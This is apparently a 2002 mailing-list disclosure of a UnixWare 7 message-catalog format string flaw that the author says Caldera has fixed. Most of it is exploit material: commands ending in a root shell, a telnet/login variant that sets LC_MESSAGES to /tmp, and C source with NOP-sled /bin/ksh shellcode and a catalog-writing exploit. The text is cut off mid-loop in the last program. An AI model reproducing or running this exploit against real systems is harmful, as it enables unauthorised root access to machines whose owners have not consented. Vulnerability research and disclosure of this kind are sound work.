De: "jGgM." À: Objet: Unixware Message catalog exploit code Date: lundi 11 février 2002 19:22 Hi, I'm jGgM. I was reported this problem Caldera, a few week ago. And, This exploit is fixed already. Hacker can modify message catalog and, It can possible format string exploit. for example) $ gcc -o expshell expshell.c $ gcc -o getret getret.c $ gcc -o fmt_exp fmt_exp.c $ ./expshell $ ./getret e=8047af7 $ ./fmt_exp 0x8047af7 16 ( 16 is offset ) ...........(wait 30 minutes ). ...... # id uid=0(root) gid=3(sys) ...................... This can exploit all of unixware 7 setuid/setgid command. Also, can exploit telnetd and login. example) $ telnet telnet> env def LC_MESSAGES /tmp telnet> o localhost Trying.... ..... login: blah blah.. password: blah.. blash.. ...... (wait 30 minutes.. ) # ------------------------------------------------ Korean security forum http://www.forsecure.com http://www.netemperor.com ------------------------------------------------ Here is code. ------------------ expshell.c ------------------ #include char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xeb\x1a" /* jmp */ "\x33\xd2" /* xorl %edx,%edx */ "\x58" /* popl %eax */ "\x8d\x78\x14" /* leal 0x14(%eax),%edi */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x92" /* xchgl %eax,%edx */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x42\x08" /* movb %al,0x8(%edx) */ "\x83\xef\x3b" /* subl $0x3b,%edi */ "\xb0\x9a" /* movb $0x9a,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\x47" /* incl %edi */ "\xb0\x07" /* movb $0x07,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\xb0\x0b" /* movb $0x0b,%al */ "\xe8\xe1\xff\xff\xff" /* call */ "/bin/ksh" ; main(int argc, char *argv[]) { char buff[1024]; sprintf(buff, "EGG=%s", shellcode); putenv(buff); putenv("LC_MESSAGES=/tmp"); system("/usr/bin/tcsh"); } --------------------------------------------------------------- ---------------- getret.c -------------------- main() { char *a; a = getenv("EGG"); printf ("e=%p\n", a); } ----------------------------------------------- ---------------- fmt_exp.c ----------------------------- #include #include "shellcode.h" /* This is base of format string return address */ /* Base address of vxprint is 0x20c7c(134268) */ #define BASE 134268 main(int argc, char *argv[]) { FILE *fp; char *retaddr; long g_len, offset; int count, count2, line=700, n=19; if(argc < 2 || argc > 3) { printf("Usage: %s ret-address offset\n", argv[0]); exit(1); } retaddr = argv[1]; if(argc == 3) offset = atol(argv[2]); else offset = 0; g_len = strtol(retaddr, NULL, 16); g_len -= BASE; g_len += offset; fp = fopen("testdef", "w+"); if(fp == NULL) { fprintf(stderr, "can not open file.\n"); exit(1); } for(count=0; count